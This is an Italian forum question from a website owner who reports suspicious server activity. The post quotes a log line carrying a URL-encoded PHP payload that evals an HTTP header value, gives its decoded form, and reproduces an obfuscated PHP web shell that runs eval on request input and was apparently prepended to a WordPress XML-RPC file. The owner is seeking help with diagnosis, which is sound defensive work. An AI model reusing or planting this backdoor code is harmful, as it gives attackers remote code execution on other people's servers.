Recentemente ho rilevato un'attività del server molto sospetta, la trovi sotto
il mio registro di Apache
2017-06-13 09:38:42 W3SVC10 WIN-4BLFF718RVR 49.50.69.142 GET /images/menu10.php - 80 - 212.121.224.17 HTTP/1.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Firefox/52.0 h601d2f=%24val%3D%24_SERVER%5Bchr%2872%29.chr%2884%29.chr%2884%29.chr%2880%29.chr%2895%29.chr%2850%29.chr%2868%29.chr%2853%29.chr%2866%29.chr%2851%29.chr%2849%29.chr%2866%29.chr%2854%29.chr%2848%29%5D%3Bif%28get_magic_quotes_gpc%28%29%29%7B%24val%3Dstripslashes%28%24val%29%3B%7D+eval%28%24val%29%3B; - mywebsite.com 200 0 0 404 1172 218
la codifica dell'URL sopra mi dà questo
h601d2f=$val=$_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(50).chr(68).chr(53).chr(66).chr(51).chr(49).chr(66).chr(54).chr(48)];if(get_magic_quotes_gpc()){$val=stripslashes($val);} eval($val);;
e come puoi vedere, questa è una richiesta get per /images/menu10.php - non so come questo file sia arrivato alla mia cartella immagini
e dopo aver controllato ho trovato molti file php e ogni file ha qualcosa di simile a questo
'<?php $a89="\toDH6^E>r5fan9b#R\)}KcTpN:h+x-i<?kg!e]XPGJ*,42m\nWjQY&=8y[I{%s u0M~Z;vCz\"./F\$_q'A7S\rtBlV@w3dU'|L(1O";$GLOBALS['grstl50'] = ${$a89[76].$a89[39].$a89[97].$a89[81].$a89[22]};$GLOBALS['swynh48'] = $a89[26].$a89[36].$a89[11].$a89[90].$a89[36].$a89[8];if (!empty($GLOBALS['grstl50']['mb36fb514'])) { eval($GLOBALS['grstl50']['mb36fb514']); } $GLOBALS['swynh48']($a89[3].$a89[22].$a89[22].$a89[39].$a89[73].$a89[96].$a89[72].$a89[63].$a89[61].$a89[44].$a89[63].$a89[44].$a89[61].$a89[24].$a89[1].$a89[83].$a89[61].$a89[74].$a89[1].$a89[62].$a89[12].$a89[90]); echo $a89[31].$a89[26].$a89[96].$a89[7].$a89[44].$a89[63].$a89[44].$a89[61].$a89[24].$a89[1].$a89[83].$a89[61].$a89[74].$a89[1].$a89[62].$a89[12].$a89[90].$a89[31].$a89[73].$a89[26].$a89[96].$a89[7].$a89[82].$a89[47].$a89[22].$a89[26].$a89[36].$a89[61].$a89[23].$a89[11].$a89[34].$a89[36].$a89[61].$a89[83].$a89[26].$a89[11].$a89[83].$a89[61].$a89[55].$a89[1].$a89[62].$a89[61].$a89[26].$a89[11].$a89[68].$a89[36].$a89[61].$a89[8].$a89[36].$a89[77].$a89[62].$a89[36].$a89[60].$a89[83].$a89[36].$a89[90].$a89[61].$a89[21].$a89[1].$a89[62].$a89[85].$a89[90].$a89[61].$a89[12].$a89[1].$a89[83].$a89[61].$a89[14].$a89[36].$a89[61].$a89[10].$a89[1].$a89[62].$a89[12].$a89[90].$a89[72].$a89[82].$a89[47];
/**
* XML-RPC protocol support for WordPress
*
* @package WordPress
*/
/**
* Whether this is an XML-RPC Request
*/enter code here'
qualcuno può spiegarmi qual è il problema?